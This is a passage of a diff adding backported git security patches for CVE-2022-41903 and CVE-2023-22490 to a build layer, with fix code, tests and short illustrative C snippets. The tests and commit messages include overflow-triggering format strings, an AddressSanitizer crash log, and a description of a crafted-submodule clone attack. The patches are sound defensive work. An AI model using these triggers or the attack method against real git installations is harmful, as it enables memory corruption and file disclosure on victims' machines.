+The input parameter is an `int` though, whereas `strlen()` returns a
+`size_t`. This can lead to implementation-defined behaviour though when
+the `size_t` cannot be represented by the `int`. In the general case
+though this leads to wrap-around and thus to negative string sizes,
+which is sure enough to not lead to well-defined behaviour.
+
+Fix this by accepting a `size_t` instead of an `int` as string length.
+While this takes away the ability of callers to simply pass in `-1` as
+string length, it really is trivial enough to convert them to pass in
+`strlen()` instead.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/522cc87fdc25449222a5894a428eebf4b8d5eaa9]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ column.c | 2 +-
+ pretty.c | 4 ++--
+ utf8.c | 8 +++-----
+ utf8.h | 2 +-
+ 4 files changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/column.c b/column.c
+index 4a38eed..0c79850 100644
+--- a/column.c
++++ b/column.c
+@@ -23,7 +23,7 @@ struct column_data {
+ /* return length of 's' in letters, ANSI escapes stripped */
+ static int item_length(const char *s)
+ {
+- return utf8_strnwidth(s, -1, 1);
++ return utf8_strnwidth(s, strlen(s), 1);
+ }
+
+ /*
+diff --git a/pretty.c b/pretty.c
+index ff9fc97..c3c1443 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1437,7 +1437,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ int occupied;
+ if (!start)
+ start = sb->buf;
+- occupied = utf8_strnwidth(start, -1, 1);
++ occupied = utf8_strnwidth(start, strlen(start), 1);
+ occupied += c->pretty_ctx->graph_width;
+ padding = (-padding) - occupied;
+ }
+@@ -1455,7 +1455,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ placeholder++;
+ total_consumed++;
+ }
+- len = utf8_strnwidth(local_sb.buf, -1, 1);
++ len = utf8_strnwidth(local_sb.buf, local_sb.len, 1);
+
+ if (c->flush_type == flush_left_and_steal) {
+ const char *ch = sb->buf + sb->len - 1;
+diff --git a/utf8.c b/utf8.c
+index 5c8f151..a66984b 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -206,13 +206,11 @@ int utf8_width(const char **start, size_t *remainder_p)
+ * string, assuming that the string is utf8. Returns strlen() instead
+ * if the string does not look like a valid utf8 string.
+ */
+-int utf8_strnwidth(const char *string, int len, int skip_ansi)
++int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ {
+ int width = 0;
+ const char *orig = string;
+
+- if (len == -1)
+- len = strlen(string);
+ while (string && string < orig + len) {
+ int skip;
+ while (skip_ansi &&
+@@ -225,7 +223,7 @@ int utf8_strnwidth(const char *string, int len, int skip_ansi)
+
+ int utf8_strwidth(const char *string)
+ {
+- return utf8_strnwidth(string, -1, 0);
++ return utf8_strnwidth(string, strlen(string), 0);
+ }
+
+ int is_utf8(const char *text)
+@@ -792,7 +790,7 @@ int skip_utf8_bom(char **text, size_t len)
+ void strbuf_utf8_align(struct strbuf *buf, align_type position, unsigned int width,
+ const char *s)
+ {
+- int slen = strlen(s);
++ size_t slen = strlen(s);
+ int display_len = utf8_strnwidth(s, slen, 0);
+ int utf8_compensation = slen - display_len;
+
+diff --git a/utf8.h b/utf8.h
+index fcd5167..6da1b6d 100644
+--- a/utf8.h
++++ b/utf8.h
+@@ -7,7 +7,7 @@ typedef unsigned int ucs_char_t; /* assuming 32bit int */
+
+ size_t display_mode_esc_sequence_len(const char *s);
+ int utf8_width(const char **start, size_t *remainder_p);
+-int utf8_strnwidth(const char *string, int len, int skip_ansi);
++int utf8_strnwidth(const char *string, size_t len, int skip_ansi);
+ int utf8_strwidth(const char *string);
+ int is_utf8(const char *text);
+ int is_encoding_utf8(const char *name);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
new file mode 100644
index 0000000000..3de6a5ba6a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
@@ -0,0 +1,67 @@
+From 17d23e8a3812a5ca3dd6564e74d5250f22e5d76d Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:00 +0100
+Subject: [PATCH 08/12] utf8: fix returning negative string width
+
+The `utf8_strnwidth()` function calls `utf8_width()` in a loop and adds
+its returned width to the end result. `utf8_width()` can return `-1`
+though in case it reads a control character, which means that the
+computed string width is going to be wrong. In the worst case where
+there are more control characters than non-control characters, we may
+even return a negative string width.
+
+Fix this bug by treating control characters as having zero width.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/17d23e8a3812a5ca3dd6564e74d5250f22e5d76d]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ utf8.c | 8 ++++++--
+ 2 files changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 23ac508..261a6f0 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -820,6 +820,12 @@ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping dire
+ test_cmp expect error
+ '
+
++test_expect_success 'log --pretty with padding and preceding control chars' '
++ printf "\20\20 0" >expect &&
++ git log -1 --pretty="format:%x10%x10%>|(4)%x30" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+diff --git a/utf8.c b/utf8.c
+index a66984b..6632bd2 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -212,11 +212,15 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ const char *orig = string;
+
+ while (string && string < orig + len) {
+- int skip;
++ int glyph_width, skip;
++
+ while (skip_ansi &&
+ (skip = display_mode_esc_sequence_len(string)) != 0)
+ string += skip;
+- width += utf8_width(&string, NULL);
++
++ glyph_width = utf8_width(&string, NULL);
++ if (glyph_width > 0)
++ width += glyph_width;
+ }
+ return string ? width : len;
+ }
+--
+2.25.1
+
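A compact standalone C sketch of the width-summing bug fixed above, using a
toy width function in place of `utf8_width()` (names and behaviour simplified
for illustration):

    #include <stdio.h>

    /* Toy model: control characters report -1, everything else width 1. */
    static int glyph_width(unsigned char c)
    {
        return c < 0x20 ? -1 : 1;
    }

    static int string_width(const char *s)
    {
        int width = 0;

        for (; *s; s++) {
            int w = glyph_width((unsigned char)*s);
            if (w > 0)          /* the fix: never let -1 drag the sum down */
                width += w;
        }
        return width;
    }

    int main(void)
    {
        printf("%d\n", string_width("\020\020 0"));   /* 2, not 0 or negative */
        return 0;
    }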
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
new file mode 100644
index 0000000000..761d4c6a9f
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-09.patch
@@ -0,0 +1,162 @@
+From 937b71cc8b5b998963a7f9a33312ba3549d55510 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:04 +0100
+Subject: [PATCH 09/12] utf8: fix overflow when returning string width
+
+The return type of both `utf8_strwidth()` and `utf8_strnwidth()` is
+`int`, but we operate on string lengths which are typically of type
+`size_t`. This means that when the string is longer than `INT_MAX`, we
+will overflow and thus return a negative result.
+
+This can lead to an out-of-bounds write with `--pretty=format:%<(1)%B`
+and a commit message that is 2^31+1 bytes long:
+
+ =================================================================
+ ==26009==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000001168 at pc 0x7f95c4e5f427 bp 0x7ffd8541c900 sp 0x7ffd8541c0a8
+ WRITE of size 2147483649 at 0x603000001168 thread T0
+ #0 0x7f95c4e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
+ #1 0x5612bbb1068c in format_and_pad_commit pretty.c:1763
+ #2 0x5612bbb1087a in format_commit_item pretty.c:1801
+ #3 0x5612bbc33bab in strbuf_expand strbuf.c:429
+ #4 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
+ #5 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
+ #6 0x5612bba0a4d5 in show_log log-tree.c:781
+ #7 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
+ #8 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #9 0x5612bb69235b in cmd_log_walk builtin/log.c:549
+ #10 0x5612bb6951a2 in cmd_log builtin/log.c:883
+ #11 0x5612bb56c993 in run_builtin git.c:466
+ #12 0x5612bb56d397 in handle_builtin git.c:721
+ #13 0x5612bb56db07 in run_argv git.c:788
+ #14 0x5612bb56e8a7 in cmd_main git.c:923
+ #15 0x5612bb803682 in main common-main.c:57
+ #16 0x7f95c4c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #17 0x7f95c4c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #18 0x5612bb5680e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x603000001168 is located 0 bytes to the right of 24-byte region [0x603000001150,0x603000001168)
+ allocated by thread T0 here:
+ #0 0x7f95c4ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+ #1 0x5612bbcdd556 in xrealloc wrapper.c:136
+ #2 0x5612bbc310a3 in strbuf_grow strbuf.c:99
+ #3 0x5612bbc32acd in strbuf_add strbuf.c:298
+ #4 0x5612bbc33aec in strbuf_expand strbuf.c:418
+ #5 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
+ #6 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
+ #7 0x5612bba0a4d5 in show_log log-tree.c:781
+ #8 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
+ #9 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #10 0x5612bb69235b in cmd_log_walk builtin/log.c:549
+ #11 0x5612bb6951a2 in cmd_log builtin/log.c:883
+ #12 0x5612bb56c993 in run_builtin git.c:466
+ #13 0x5612bb56d397 in handle_builtin git.c:721
+ #14 0x5612bb56db07 in run_argv git.c:788
+ #15 0x5612bb56e8a7 in cmd_main git.c:923
+ #16 0x5612bb803682 in main common-main.c:57
+ #17 0x7f95c4c3c28f (/usr/lib/libc.so.6+0x2328f)
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
+ Shadow bytes around the buggy address:
+ 0x0c067fff81d0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
+ 0x0c067fff81e0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
+ 0x0c067fff81f0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
+ 0x0c067fff8200: fd fd fd fa fa fa fd fd fd fd fa fa 00 00 00 fa
+ 0x0c067fff8210: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
+ =>0x0c067fff8220: fd fa fa fa fd fd fd fa fa fa 00 00 00[fa]fa fa
+ 0x0c067fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==26009==ABORTING
+
+Now the proper fix for this would be to convert both functions to return
+a `size_t` instead of an `int`. But given that this commit may be part
+of a security release, let's instead do the minimal viable fix and die
+in case we see an overflow.
+
+Add a test that would have previously caused us to crash.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/937b71cc8b5b998963a7f9a33312ba3549d55510]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 8 ++++++++
+ utf8.c | 12 +++++++++---
+ 2 files changed, 17 insertions(+), 3 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 261a6f0..de15007 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -843,4 +843,12 @@ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit mes
+ test_cmp expect actual
+ '
+
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message does not cause allocation failure' '
++ test_must_fail git log -1 --format="%<(1)%B" $huge_commit 2>error &&
++ cat >expect <<-EOF &&
++ fatal: number too large to represent as int on this platform: 2147483649
++ EOF
++ test_cmp expect error
++'
++
+ test_done
+diff --git a/utf8.c b/utf8.c
+index 6632bd2..03be475 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -208,11 +208,12 @@ int utf8_width(const char **start, size_t *remainder_p)
+ */
+ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ {
+- int width = 0;
+ const char *orig = string;
++ size_t width = 0;
+
+ while (string && string < orig + len) {
+- int glyph_width, skip;
++ int glyph_width;
++ size_t skip;
+
+ while (skip_ansi &&
+ (skip = display_mode_esc_sequence_len(string)) != 0)
+@@ -222,7 +223,12 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ if (glyph_width > 0)
+ width += glyph_width;
+ }
+- return string ? width : len;
++
++ /*
++ * TODO: fix the interface of this function and `utf8_strwidth()` to
++ * return `size_t` instead of `int`.
++ */
++ return cast_size_t_to_int(string ? width : len);
+ }
+
+ int utf8_strwidth(const char *string)
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
new file mode 100644
index 0000000000..bbfc6e758f
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
@@ -0,0 +1,99 @@
+From 81c2d4c3a5ba0e6ab8c348708441fed170e63a82 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:10 +0100
+Subject: [PATCH 10/12] utf8: fix checking for glyph width in strbuf_utf8_replace()
+
+In `strbuf_utf8_replace()`, we call `utf8_width()` to compute the width
+of the current glyph. If the glyph is a control character though it can
+be that `utf8_width()` returns `-1`, but because we assign this value to
+a `size_t` the conversion will cause us to underflow. This bug can
+easily be triggered with the following command:
+
+ $ git log --pretty='format:xxx%<|(1,trunc)%x10'
+
+>From all I can see though this seems to be a benign underflow that has
+no security-related consequences.
+
+Fix the bug by using an `int` instead. When we see a control character,
+we now copy it into the target buffer but don't advance the current
+width of the string.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/81c2d4c3a5ba0e6ab8c348708441fed170e63a82]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 7 +++++++
+ utf8.c | 19 ++++++++++++++-----
+ 2 files changed, 21 insertions(+), 5 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index de15007..52c8bc8 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -826,6 +826,13 @@ test_expect_success 'log --pretty with padding and preceding control chars' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty truncation with control chars' '
++ test_commit "$(printf "\20\20\20\20xxxx")" file contents commit-with-control-chars &&
++ printf "\20\20\20\20x.." >expect &&
++ git log -1 --pretty="format:%<(3,trunc)%s" commit-with-control-chars >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+diff --git a/utf8.c b/utf8.c
+index 03be475..ec03e69 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -377,6 +377,7 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ dst = sb_dst.buf;
+
+ while (src < end) {
++ int glyph_width;
+ char *old;
+ size_t n;
+
+@@ -390,21 +391,29 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ break;
+
+ old = src;
+- n = utf8_width((const char**)&src, NULL);
+- if (!src) /* broken utf-8, do nothing */
++ glyph_width = utf8_width((const char**)&src, NULL);
++ if (!src) /* broken utf-8, do nothing */
+ goto out;
+- if (n && w >= pos && w < pos + width) {
++
++ /*
++ * In case we see a control character we copy it into the
++ * buffer, but don't add it to the width.
++ */
++ if (glyph_width < 0)
++ glyph_width = 0;
++
++ if (glyph_width && w >= pos && w < pos + width) {
+ if (subst) {
+ memcpy(dst, subst, subst_len);
+ dst += subst_len;
+ subst = NULL;
+ }
+- w += n;
++ w += glyph_width;
+ continue;
+ }
+ memcpy(dst, old, src - old);
+ dst += src - old;
+- w += n;
++ w += glyph_width;
+ }
+ strbuf_setlen(&sb_dst, dst - sb_dst.buf);
+ strbuf_swap(sb_src, &sb_dst);
+--
+2.25.1
+
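The underflow described above comes from storing a possibly negative return
value in an unsigned variable. A minimal standalone C sketch (illustrative
only):

    #include <stdio.h>

    int main(void)
    {
        int glyph_width = -1;      /* "this was a control character" */
        size_t n = glyph_width;    /* the old code's bug: wraps to SIZE_MAX */

        printf("as int    : %d\n", glyph_width);
        printf("as size_t : %zu\n", n);

        /* The fix keeps the value signed and only adds it when positive. */
        size_t width = 0;
        if (glyph_width > 0)
            width += (size_t)glyph_width;
        printf("width     : %zu\n", width);
        return 0;
    }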
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
new file mode 100644
index 0000000000..f339edfc8a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
@@ -0,0 +1,90 @@
+From f930a2394303b902e2973f4308f96529f736b8bc Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:15 +0100
+Subject: [PATCH 11/12] utf8: refactor strbuf_utf8_replace to not rely on preallocated buffer
+
+In `strbuf_utf8_replace`, we preallocate the destination buffer and then
+use `memcpy` to copy bytes into it at computed offsets. This feels
+rather fragile and is hard to understand at times. Refactor the code to
+instead use `strbuf_add` and `strbuf_addstr` so that we can be sure that
+there is no possibility to perform an out-of-bounds write.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/f930a2394303b902e2973f4308f96529f736b8bc]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ utf8.c | 34 +++++++++++++---------------------
+ 1 file changed, 13 insertions(+), 21 deletions(-)
+
+diff --git a/utf8.c b/utf8.c
+index ec03e69..a13f5e3 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -365,26 +365,20 @@ void strbuf_add_wrapped_bytes(struct strbuf *buf, const char *data, int len,
+ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ const char *subst)
+ {
+- struct strbuf sb_dst = STRBUF_INIT;
+- char *src = sb_src->buf;
+- char *end = src + sb_src->len;
+- char *dst;
+- int w = 0, subst_len = 0;
++ const char *src = sb_src->buf, *end = sb_src->buf + sb_src->len;
++ struct strbuf dst;
++ int w = 0;
+
+- if (subst)
+- subst_len = strlen(subst);
+- strbuf_grow(&sb_dst, sb_src->len + subst_len);
+- dst = sb_dst.buf;
++ strbuf_init(&dst, sb_src->len);
+
+ while (src < end) {
++ const char *old;
+ int glyph_width;
+- char *old;
+ size_t n;
+
+ while ((n = display_mode_esc_sequence_len(src))) {
+- memcpy(dst, src, n);
++ strbuf_add(&dst, src, n);
+ src += n;
+- dst += n;
+ }
+
+ if (src >= end)
+@@ -404,21 +398,19 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+
+ if (glyph_width && w >= pos && w < pos + width) {
+ if (subst) {
+- memcpy(dst, subst, subst_len);
+- dst += subst_len;
++ strbuf_addstr(&dst, subst);
+ subst = NULL;
+ }
+- w += glyph_width;
+- continue;
++ } else {
++ strbuf_add(&dst, old, src - old);
+ }
+- memcpy(dst, old, src - old);
+- dst += src - old;
++
+ w += glyph_width;
+ }
+- strbuf_setlen(&sb_dst, dst - sb_dst.buf);
+- strbuf_swap(sb_src, &sb_dst);
++
++ strbuf_swap(sb_src, &dst);
+ out:
+- strbuf_release(&sb_dst);
++ strbuf_release(&dst);
+ }
+
+ /*
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
new file mode 100644
index 0000000000..978865978d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
@@ -0,0 +1,124 @@
+From 304a50adff6480ede46b68f7545baab542cbfb46 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:23 +0100
+Subject: [PATCH 12/12] pretty: restrict input lengths for padding and wrapping formats
+
+Both the padding and wrapping formatting directives allow the caller to
+specify an integer that ultimately leads to us adding this many chars to
+the result buffer. As a consequence, it is trivial to e.g. allocate 2GB
+of RAM via a single formatting directive and cause resource exhaustion
+on the machine executing this logic. Furthermore, it is debatable
+whether there are any sane usecases that require the user to pad data to
+2GB boundaries or to indent wrapped data by 2GB.
+
+Restrict the input sizes to 16 kilobytes at a maximum to limit the
+amount of bytes that can be requested by the user. This is not meant
+as a fix because there are ways to trivially amplify the amount of
+data we generate via formatting directives; the real protection is
+achieved by the changes in previous steps to catch and avoid integer
+wraparound that causes us to under-allocate and access beyond the
+end of allocated memory reagions. But having such a limit
+significantly helps fuzzing the pretty format, because the fuzzer is
+otherwise quite fast to run out-of-memory as it discovers these
+formatters.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/304a50adff6480ede46b68f7545baab542cbfb46]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 26 ++++++++++++++++++++++++++
+ t/t4205-log-pretty-formats.sh | 24 +++++++++++++++---------
+ 2 files changed, 41 insertions(+), 9 deletions(-)
+
+diff --git a/pretty.c b/pretty.c
+index c3c1443..e9687f0 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -13,6 +13,13 @@
+ #include "gpg-interface.h"
+ #include "trailer.h"
+
++/*
++ * The limit for formatting directives, which enable the caller to append
++ * arbitrarily many bytes to the formatted buffer. This includes padding
++ * and wrapping formatters.
++ */
++#define FORMATTING_LIMIT (16 * 1024)
++
+ static char *user_format;
+ static struct cmt_fmt_map {
+ const char *name;
+@@ -1029,6 +1036,15 @@ static size_t parse_padding_placeholder(const char *placeholder,
+ if (!*end || end == start)
+ return 0;
+ width = strtol(start, &next, 10);
++
++ /*
++ * We need to limit the amount of padding, or otherwise this
++ * would allow the user to pad the buffer by arbitrarily many
++ * bytes and thus cause resource exhaustion.
++ */
++ if (width < -FORMATTING_LIMIT || width > FORMATTING_LIMIT)
++ return 0;
++
+ if (next == start || width == 0)
+ return 0;
+ if (width < 0) {
+@@ -1188,6 +1204,16 @@ static size_t format_commit_one(struct strbuf *sb, /* in UTF-8 */
+ if (*next != ')')
+ return 0;
+ }
++
++ /*
++ * We need to limit the format here as it allows the
++ * user to prepend arbitrarily many bytes to the buffer
++ * when rewrapping.
++ */
++ if (width > FORMATTING_LIMIT ||
++ indent1 > FORMATTING_LIMIT ||
++ indent2 > FORMATTING_LIMIT)
++ return 0;
+ rewrap_message_tail(sb, c, width, indent1, indent2);
+ return end - placeholder + 1;
+ } else
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 52c8bc8..572d02f 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -809,15 +809,21 @@ test_expect_success 'log --pretty with magical wrapping directives' '
+ '
+
+ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
+- cat >expect <<-EOF &&
+- fatal: number too large to represent as int on this platform: 2147483649
+- EOF
+- test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
+- test_cmp expect error &&
+- test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
+- test_cmp expect error &&
+- test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
+- test_cmp expect error
++ printf "%%w(2147483649,1,1)0" >expect &&
++ git log -1 --pretty="format:%w(2147483649,1,1)%x30" >actual &&
++ test_cmp expect actual &&
++ printf "%%w(1,2147483649,1)0" >expect &&
++ git log -1 --pretty="format:%w(1,2147483649,1)%x30" >actual &&
++ test_cmp expect actual &&
++ printf "%%w(1,1,2147483649)0" >expect &&
++ git log -1 --pretty="format:%w(1,1,2147483649)%x30" >actual &&
++ test_cmp expect actual
++'
++
++test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing padding directive' '
++ printf "%%<(2147483649)0" >expect &&
++ git log -1 --pretty="format:%<(2147483649)%x30" >actual &&
++ test_cmp expect actual
+ '
+
+ test_expect_success 'log --pretty with padding and preceding control chars' '
+--
+2.25.1
+
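The limit introduced above turns absurd padding or wrapping widths into a
parse failure. A standalone C sketch of that check, using the same constant
value but otherwise simplified and not taken from pretty.c:

    #include <stdio.h>
    #include <stdlib.h>

    #define FORMATTING_LIMIT (16 * 1024)

    /* Returns 1 and stores the width when it parses and is within bounds,
     * otherwise 0 so the caller treats the directive as plain text. */
    static int parse_width(const char *s, long *out)
    {
        char *next;
        long width = strtol(s, &next, 10);

        if (next == s || width == 0)
            return 0;
        if (width < -FORMATTING_LIMIT || width > FORMATTING_LIMIT)
            return 0;
        *out = width;
        return 1;
    }

    int main(void)
    {
        long w;

        printf("%d\n", parse_width("80", &w));          /* 1: accepted */
        printf("%d\n", parse_width("2147483649", &w));  /* 0: rejected */
        return 0;
    }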
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
new file mode 100644
index 0000000000..cc9b448c5c
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
@@ -0,0 +1,179 @@
+From 58325b93c5b6212697b088371809e9948fee8052 Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:45 -0500
+Subject: [PATCH 1/3] t5619: demonstrate clone_local() with ambiguous transport
+
+When cloning a repository, Git must determine (a) what transport
+mechanism to use, and (b) whether or not the clone is local.
+
+Since f38aa83 (use local cloning if insteadOf makes a local URL,
+2014-07-17), the latter check happens after the remote has been
+initialized, and references the remote's URL instead of the local path.
+This is done to make it possible for a `url.<base>.insteadOf` rule to
+convert a remote URL into a local one, in which case the `clone_local()`
+mechanism should be used.
+
+However, with a specially crafted repository, Git can be tricked into
+using a non-local transport while still setting `is_local` to "1" and
+using the `clone_local()` optimization. The below test case
+demonstrates such an instance, and shows that it can be used to include
+arbitrary (known) paths in the working copy of a cloned repository on a
+victim's machine[^1], even if local file clones are forbidden by
+`protocol.file.allow`.
+
+This happens in a few parts:
+
+ 1. We first call `get_repo_path()` to see if the remote is a local
+ path. If it is, we replace the repo name with its absolute path.
+
+ 2. We then call `transport_get()` on the repo name and decide how to
+ access it. If it was turned into an absolute path in the previous
+ step, then we should always treat it like a file.
+
+ 3. We use `get_repo_path()` again, and set `is_local` as appropriate.
+ But it's already too late to rewrite the repo name as an absolute
+ path, since we've already fed it to the transport code.
+
+The attack works by including a submodule whose URL corresponds to a
+path on disk. In the below example, the repository "sub" is reachable
+via the dumb HTTP protocol at (something like):
+
+ http://127.0.0.1:NNNN/dumb/sub.git
+
+However, the path "http:/127.0.0.1:NNNN/dumb" (that is, a top-level
+directory called "http:", then nested directories "127.0.0.1:NNNN", and
+"dumb") exists within the repository, too.
+
+To determine this, it first picks the appropriate transport, which is
+dumb HTTP. It then uses the remote's URL in order to determine whether
+the repository exists locally on disk. However, the malicious repository
